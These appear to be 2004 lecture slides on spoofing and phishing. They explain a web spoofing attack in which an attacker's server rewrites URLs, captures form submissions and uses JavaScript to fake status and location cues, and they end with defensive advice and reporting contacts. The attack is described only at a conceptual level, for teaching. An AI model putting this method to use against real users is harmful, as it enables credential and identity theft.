Spoofing

Rafael Sabino 10/28/2004

Introduction
What is spoofing? Context and Security relevant decisions Phishing Web spoofing Remedies

What is Spoofing?
Dictionary.com definitions:
To deceive A hoax

Security Relevant Decisions

Decisions that can lead to undesirable results Examples Accepting data as being true and accurate

Context
The browser, text, and pictures Names of objects Timing of events

Context Spoofing (Examples)

http://www.antiphishing.org/phishing_arc

Context Spoofing
Spoofed emails have upwards of 20% success rates Costs billions of dollars to the industry Brand names attacked:
1. 2. 3. 4. 5. 6. Citigroup Wachovia Bank of America Yahoo! Ebay Paypal

7. Bestbuy 8. Microsoft MSN 9. FBI

Consequences
Unauthorized Surveillance Tampering Identity theft

What is Web Spoofing?

Creating a shadow copy of the world wide web Shadow copy is funneled through attackers machine Data tampering

Web Spoofing Attack

The physical world can also be spoofed Security relevant decisions and context

How does the Attack Work?

Step : 1 Rewriting the URL: Example:
home.netscape.com www.attacker.com/http://home. netscape.com

How does the Attack Work?

www.attacker.org 1. Request Spoof URL 4. Change page

5. Spoofed page 3. Real Page contents

2. Request real URL

www.server.com

How does the Attack Work?

Once attacker server obtains the real URL, it modifies all links Rewritten page is provided to victims browser This funnels all information Is it possible to spoof the whole web?

Forms
Submitted data goes to the attackers server Allows for tampering Attacker can also modify returned data

Secure Connections
Everything will work the same Secure connection indicator will be turned on Secure connection is with attackers server Secure connections are a false sense of security

Starting the Attack

Put links in popular places Emails Search Engines

Completing the Illusion

There are cues that can destroy the illusion:
Status line Location line Viewing document source

These can be virtually eliminated

Status Line
Displays URL links points to Displays name of server being contacted JavaScript is the solution

Location Line
Displays URL of current page User can type in any URL JavaScript is the solution

Viewing Document Source

Menu bar allows user to see pages source JavaScript can be used to create a fake menu bar

Tracing the Attacker

Is possible if attacker uses his/her own machine Stolen computers are used to launch attacks Hacked computers are used as well

What can we do?

Short term solution:
JavaScript Location line is visible Pay attention to location line

Be selective with your features

What can we do?

Do not reply to or click on a link that will lead you to a webpage asking you for info. Look for the presence of a padlock and https://. Both most be present for a connection to be secure Keep up with updates

What can we do?

Check your bank / credit card statements To report suspicious activity, send email to Federal Trade Commision: uce@ftc.gov If you are a victim, file a complaint at www.ftc.gov

Resources
www.antiphishing.com

http://www.cs.princeton.edu/sip/pub/spoo
Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes and Antidotes. John Wiley and Sons, New York, 1996.